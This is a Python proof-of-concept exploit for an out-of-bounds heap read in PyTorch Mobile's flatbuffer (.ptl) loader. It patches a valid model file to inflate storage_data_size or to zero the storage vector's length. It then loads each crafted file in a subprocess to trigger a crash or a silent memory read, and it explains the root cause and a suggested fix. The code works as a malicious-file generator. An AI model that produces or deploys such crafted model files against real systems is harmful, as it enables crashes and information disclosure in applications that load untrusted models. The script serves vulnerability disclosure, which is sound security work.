| |
| """ |
| PoC: Flatbuffer Storage Vector OOB Read in PyTorch Mobile (.ptl) |
| |
| Vulnerability: The flatbuffer loader's getStorage() method at |
| flatbuffer_loader.cpp:696-700 checks `index < storage_loaded_.size()` and |
| `index < storages_.size()`, but both vectors are sized from |
| `module->storage_data_size()` β an integer field in the flatbuffer schema |
| that is INDEPENDENT of the actual `storage_data()` vector. |
| |
| A crafted .ptl file can set `storage_data_size` larger than the actual |
| `storage_data` vector length, then reference storage indices that pass the |
| bounds check but are OOB on the real vector. GetMutableObject(index) on the |
| flatbuffer vector reads past its bounds, interpreting random flatbuffer data |
| as a StorageData table β heap OOB read, crash, or information disclosure. |
| |
| Root cause: |
| - flatbuffer_loader.cpp:306-307 β storages_ sized from storage_data_size (int field) |
| - flatbuffer_loader.cpp:697-698 β bounds check against storages_.size() |
| - flatbuffer_loader.cpp:700 β actual access on storage_data() (the real vector) |
| - NO check that storage_data_size <= storage_data()->size() |
| |
| Tested: PyTorch 2.10.0+cpu on Python 3.13.11 |
| """ |
|
|
| import io |
| import os |
| import struct |
| import subprocess |
| import sys |
| import tempfile |
| import warnings |
|
|
| import torch |
| import torch.nn as nn |
|
|
# Silence PyTorch serialization/deprecation warnings so PoC output stays readable.
warnings.filterwarnings('ignore')
|
|
|
|
def create_valid_flatbuffer_ptl(output_path):
    """Create a valid .ptl flatbuffer model using PyTorch's serializer.

    Scripts a tiny Linear module and saves it for the lite interpreter
    with the flatbuffer format enabled, then returns *output_path*.
    """
    scripted = torch.jit.script(nn.Linear(4, 2))
    # _use_flatbuffer=True selects the .ptl flatbuffer serialization path.
    scripted._save_for_lite_interpreter(output_path, _use_flatbuffer=True)
    return output_path
|
|
|
|
def analyze_flatbuffer(data):
    """Parse flatbuffer structure and return key offsets."""

    # Small typed readers over the raw buffer keep the offset math readable.
    def u16(pos):
        return struct.unpack_from('<H', data, pos)[0]

    def u32(pos):
        return struct.unpack_from('<I', data, pos)[0]

    def i32(pos):
        return struct.unpack_from('<i', data, pos)[0]

    info = {}

    # The buffer starts with a u32 offset to the root (Module) table.
    root = u32(0)
    info['root_table_pos'] = root

    # A table begins with a signed back-offset to its vtable.
    vtable = root - i32(root)
    info['vtable_pos'] = vtable

    # vtable slot +14: Module.storage_data_size (int field).
    sds_off = u16(vtable + 14)
    if sds_off:
        sds_pos = root + sds_off
        info['storage_data_size_pos'] = sds_pos
        info['storage_data_size_val'] = i32(sds_pos)

    # vtable slot +16: Module.storage_data vector (offset to vector).
    sd_off = u16(vtable + 16)
    if sd_off:
        sd_ref = root + sd_off
        sd_vec = sd_ref + u32(sd_ref)
        info['storage_data_vec_pos'] = sd_vec
        info['storage_data_vec_len'] = u32(sd_vec)

    # vtable slot +12: Module.ivalues vector of IValue tables.
    iv_off = u16(vtable + 12)
    if iv_off:
        iv_ref = root + iv_off
        iv_vec = iv_ref + u32(iv_ref)
        count = u32(iv_vec)
        info['ivalues_count'] = count
        info['tensor_metadata'] = []

        for idx in range(count):
            slot = iv_vec + 4 + idx * 4
            ival = slot + u32(slot)

            # Each IValue table carries its own vtable; derive field count
            # from the vtable size (header is 4 bytes, 2 bytes per slot).
            ivt = ival - i32(ival)
            nfields = (u16(ivt) - 4) // 2

            # Field 0 (vtable slot +4) holds the union type tag byte.
            tag = None
            if nfields >= 1:
                tag_off = u16(ivt + 4)
                if tag_off:
                    tag = data[ival + tag_off]

            # Tag value 5 marks a TensorMetadata payload in field 1.
            if tag == 5:
                val_off = u16(ivt + 6)
                if val_off:
                    tm = ival + val_off + u32(ival + val_off)

                    tm_vt = tm - i32(tm)
                    tm_fields = (u16(tm_vt) - 4) // 2

                    # Field 0 of TensorMetadata: storage_location_index
                    # (missing fields default to 0 / unknown position).
                    sli_val = 0
                    sli_pos = None
                    if tm_fields >= 1:
                        sli_off = u16(tm_vt + 4)
                        if sli_off:
                            sli_pos = tm + sli_off
                            sli_val = u32(sli_pos)

                    info['tensor_metadata'].append({
                        'ivalue_index': idx,
                        'tm_pos': tm,
                        'storage_location_index': sli_val,
                        'sli_byte_pos': sli_pos,
                    })

    return info
|
|
|
|
def create_malicious_ptl(input_path, output_path, oob_index=5):
    """Modify a valid .ptl flatbuffer to trigger storage vector OOB read.

    Strategy:
    1. Inflate storage_data_size to be larger than actual storage_data vector
    2. Modify a tensor's storage_location_index to reference an OOB index
    3. The loader's getStorage() passes bounds check but OOB on real vector

    Returns *output_path* after writing the patched bytes.
    """
    with open(input_path, 'rb') as f:
        data = bytearray(f.read())

    info = analyze_flatbuffer(data)

    orig_sds = info['storage_data_size_val']
    orig_vec_len = info['storage_data_vec_len']
    tensors = info['tensor_metadata']

    print(f" Original storage_data_size: {orig_sds}")
    print(f" Actual storage_data vector length: {orig_vec_len}")
    print(f" TensorMetadata entries: {len(tensors)}")
    for tm in tensors:
        print(f" ivalue[{tm['ivalue_index']}]: "
              f"storage_location_index={tm['storage_location_index']}"
              f" (byte {tm['sli_byte_pos']})")
    print()

    # Inflate the int field so oob_index passes the loader's bounds check.
    new_sds = oob_index + 5
    sds_pos = info['storage_data_size_pos']
    struct.pack_into('<i', data, sds_pos, new_sds)
    # FIX: original transition marker here was mojibake (U+03B2); use '->'.
    print(f" [*] Changed storage_data_size: {orig_sds} -> {new_sds} "
          f"(at byte {sds_pos})")

    # Pick the first tensor whose storage_location_index byte position is known.
    target_tm = next(
        (tm for tm in tensors if tm['sli_byte_pos'] is not None), None
    )

    if target_tm is None:
        # Fallback: no explicit index to patch; shrink the real vector instead
        # so even index 0 is out of bounds while storage_data_size stays valid.
        print(" [*] No explicit storage_location_index found.")
        print(" [*] Alternative: reduce storage_data vector length to 0")
        print(f" storage_data vector at byte {info['storage_data_vec_pos']}")

        vec_pos = info['storage_data_vec_pos']
        struct.pack_into('<I', data, vec_pos, 0)
        # Restore the original storage_data_size so the mismatch is the only edit.
        struct.pack_into('<i', data, sds_pos, orig_sds)
        print(f" [*] Set storage_data vector length: {orig_vec_len} -> 0")
        print(f" [*] storage_data_size remains {orig_sds}")
        print()
        print(f" Result: getStorage(0) passes bounds check (0 < {orig_sds})")
        print(f" but storage_data()->GetMutableObject(0) is OOB "
              f"(vector length = 0)")
    else:
        orig_sli = target_tm['storage_location_index']
        sli_pos = target_tm['sli_byte_pos']
        struct.pack_into('<I', data, sli_pos, oob_index)
        print(f" [*] Changed ivalue[{target_tm['ivalue_index']}] "
              f"storage_location_index: {orig_sli} -> {oob_index} "
              f"(at byte {sli_pos})")
        print()
        print(f" Result: getStorage({oob_index}) passes bounds check "
              f"({oob_index} < {new_sds})")
        print(f" but storage_data()->GetMutableObject({oob_index}) is OOB "
              f"(vector length = {orig_vec_len})")

    with open(output_path, 'wb') as f:
        f.write(data)

    print(f"\n Saved: {output_path} ({len(data)} bytes)")
    return output_path
|
|
|
|
def demonstrate_vulnerability():
    """Show the vulnerability: mismatch between storage_data_size and
    actual storage_data vector causes OOB in getStorage().

    Returns True when the malicious model crashed the child process,
    raised a RuntimeError, or loaded (silent OOB read); False otherwise.
    """
    print()
    print("=" * 70)
    print(" Part 1: Vulnerability Demonstration")
    print("=" * 70)
    print()

    # Build a known-good flatbuffer model to mutate.
    tmpdir = tempfile.mkdtemp(prefix="ptl_")
    valid_path = os.path.join(tmpdir, "valid.ptl")
    create_valid_flatbuffer_ptl(valid_path)

    print(" Step 1: Verify valid .ptl loads correctly")
    try:
        m = torch.jit.load(valid_path)
        print(f" [+] Valid model loaded: {type(m)}")
        del m
    except Exception as e:
        print(f" [-] Valid model failed: {e}")
        return False

    print()
    print(" Step 2: Create malicious .ptl with inflated storage_data_size")
    print()

    malicious_path = os.path.join(tmpdir, "malicious.ptl")
    create_malicious_ptl(valid_path, malicious_path, oob_index=5)

    print()
    # FIX: banner arrow was mojibake (U+03B2); use '->'.
    print(" Step 3: Load malicious .ptl -> OOB read in getStorage()")
    print()

    # Load in a child process so a native crash doesn't kill the PoC itself.
    # FIX: the original script's RuntimeError branch had an if/else whose two
    # arms printed the identical line; collapsed to one print.
    poc_script = f'''
import torch, sys, warnings, signal
warnings.filterwarnings('ignore')
signal.alarm(5)
try:
    m = torch.jit.load("{malicious_path}")
    print("MODEL_LOADED")
    # Try accessing the model
    try:
        result = m.forward(torch.randn(1, 4))
        print(f"FORWARD_OK: {{result}}")
    except Exception as e:
        print(f"FORWARD_ERROR: {{type(e).__name__}}: {{e}}")
except RuntimeError as e:
    print(f"RUNTIME_ERROR: {{str(e)[:200]}}")
except Exception as e:
    print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}")
'''
    result = subprocess.run(
        [sys.executable, '-c', poc_script],
        capture_output=True, text=True, timeout=10
    )

    stdout = result.stdout.strip()
    stderr = result.stderr.strip()
    retcode = result.returncode

    print(f" Return code: {retcode}")
    if stdout:
        print(f" Stdout: {stdout[:300]}")
    if stderr:
        for line in stderr.strip().split('\n')[:5]:
            print(f" Stderr: {line[:200]}")

    if retcode < 0:
        # Negative return code means the child was killed by a signal.
        signum = -retcode
        try:
            import signal as sig
            signame = sig.Signals(signum).name
        except (ValueError, AttributeError):
            signame = f"signal {signum}"
        print(f"\n [+] CRASH: Process killed by {signame} (signal {signum})")
        print(f" [+] OOB read in storage_data vector caused {signame}")
        return True
    elif "RUNTIME_ERROR" in stdout:
        print("\n [+] RuntimeError from corrupted flatbuffer data")
        return True
    elif "MODEL_LOADED" in stdout:
        print("\n [!] Model loaded (OOB read happened silently)")
        return True
    else:
        print("\n [-] Unexpected result")
        return False
|
|
|
|
def demonstrate_alternative_attack():
    """Alternative: shrink storage_data vector length instead.

    Leaves storage_data_size untouched but zeroes the in-buffer length of the
    storage_data vector, so any storage index passes the loader's bounds
    check yet is OOB on the real vector. Returns True when the child process
    crashed or errored, False otherwise.
    """
    print()
    print("=" * 70)
    print(" Part 2: Alternative -- Shrink storage_data vector length")
    print("=" * 70)
    print()

    tmpdir = tempfile.mkdtemp(prefix="ptl2_")
    valid_path = os.path.join(tmpdir, "valid.ptl")
    create_valid_flatbuffer_ptl(valid_path)

    with open(valid_path, 'rb') as f:
        data = bytearray(f.read())

    info = analyze_flatbuffer(data)
    vec_pos = info['storage_data_vec_pos']
    orig_len = info['storage_data_vec_len']
    sds = info['storage_data_size_val']

    print(f" storage_data_size (int field): {sds}")
    print(f" storage_data vector length: {orig_len}")
    print(f" storage_data vector at byte: {vec_pos}")
    print()

    # Zero the vector's length prefix; the int field still claims `sds` entries.
    struct.pack_into('<I', data, vec_pos, 0)
    # FIX: transition marker was mojibake (U+03B2); use '->'.
    print(f" [*] Set storage_data vector length: {orig_len} -> 0")
    print(f" [*] storage_data_size remains: {sds}")
    print()
    print(f" getStorage(0): passes bounds check (0 < {sds})")
    print(f" storage_data()->GetMutableObject(0): OOB! vector length = 0")
    print()

    malicious_path = os.path.join(tmpdir, "malicious_shrunk.ptl")
    with open(malicious_path, 'wb') as f:
        f.write(data)

    print(f" Saved: {malicious_path}")
    print()

    # Load in a child process so a native crash doesn't kill the PoC itself.
    poc_script = f'''
import torch, sys, warnings, signal
warnings.filterwarnings('ignore')
signal.alarm(5)
try:
    m = torch.jit.load("{malicious_path}")
    print("MODEL_LOADED")
except RuntimeError as e:
    print(f"RUNTIME_ERROR: {{str(e)[:200]}}")
except Exception as e:
    print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}")
'''
    result = subprocess.run(
        [sys.executable, '-c', poc_script],
        capture_output=True, text=True, timeout=10
    )

    stdout = result.stdout.strip()
    stderr = result.stderr.strip()
    retcode = result.returncode

    print(f" Return code: {retcode}")
    if stdout:
        print(f" Stdout: {stdout[:300]}")
    if stderr:
        for line in stderr.strip().split('\n')[:5]:
            print(f" Stderr: {line[:200]}")

    if retcode < 0:
        # Negative return code means the child was killed by a signal.
        signum = -retcode
        try:
            import signal as sig
            signame = sig.Signals(signum).name
        except (ValueError, AttributeError):
            signame = f"signal {signum}"
        print(f"\n [+] CRASH: Process killed by {signame}")
        return True
    elif "RUNTIME_ERROR" in stdout or "ERROR" in stdout:
        print("\n [+] Error from corrupted flatbuffer data")
        return True
    else:
        return False
|
|
|
|
def demonstrate_vulnerability_details():
    """Print an annotated walkthrough of the vulnerable code path and fix.

    Output-only helper: shows the two independent schema fields, the loader
    code that sizes/checks against the int field but indexes the real
    vector, and the suggested TORCH_CHECK validation. Returns None.
    """
    print()
    print("=" * 70)
    print(" Part 3: Vulnerability Details")
    print("=" * 70)
    print()

    print(" The flatbuffer schema has TWO independent fields (mobile_bytecode.fbs):")
    print()
    print(" table Module {")
    print(" storage_data_size:int; // integer field (line 205)")
    print(" storage_data:[StorageData]; // actual vector (line 206)")
    print(" }")
    print()
    print(" In parseModule() (flatbuffer_loader.cpp:306-307):")
    print(" storages_.resize(module->storage_data_size()); // uses INT field")
    print(" storage_loaded_.resize(module->storage_data_size(), false);")
    print()
    print(" In getStorage() (flatbuffer_loader.cpp:696-700):")
    print(" TORCH_CHECK(index < storage_loaded_.size()); // checks INT field")
    print(" TORCH_CHECK(index < storages_.size()); // checks INT field")
    print(" if (!storage_loaded_[index]) {")
    print(" auto* storage = module_->storage_data() // accesses REAL vector!")
    print(" ->GetMutableObject(index); // OOB!")
    print()
    print(" The loader NEVER validates:")
    print(" storage_data_size <= storage_data()->size()")
    print()
    print(" FIX: Add validation in parseModule():")
    # FIX: this separator line was a mojibake run of U+03B2 (originally a
    # horizontal rule); restored as an ASCII rule.
    print(" " + "-" * 57)
    print(" TORCH_CHECK(")
    print(" module->storage_data() &&")
    print(" module->storage_data_size() <=")
    print(" static_cast<int>(module->storage_data()->size()),")
    print(' "storage_data_size exceeds actual storage_data vector");')
    print()
|
|
|
|
def main():
    """Run all PoC stages and print a summary of the results."""
    print()
    print(" PoC: Flatbuffer Storage Vector OOB Read (.ptl)")
    print(f" PyTorch {torch.__version__}, Python {sys.version.split()[0]}")
    print()

    # Stage 1: inflate storage_data_size; Stage 2: shrink the real vector.
    inflated_ok = demonstrate_vulnerability()
    shrunk_ok = demonstrate_alternative_attack()
    demonstrate_vulnerability_details()

    # Summarize which attack variants triggered the OOB condition.
    print("=" * 70)
    print(" RESULTS:")
    if inflated_ok:
        print(" [+] Inflated storage_data_size: OOB on storage_data vector")
    if shrunk_ok:
        print(" [+] Shrunk storage_data vector: OOB on GetMutableObject()")
    print(" [+] Root cause: no validation that storage_data_size <=")
    print(" storage_data()->size() in flatbuffer_loader.cpp")
    print(" [+] Affects: PyTorch Mobile (.ptl flatbuffer format)")
    print(" [+] Fix: validate storage_data_size against actual vector length")
    print("=" * 70)
|
|
|
| if __name__ == "__main__": |
| main() |
|
|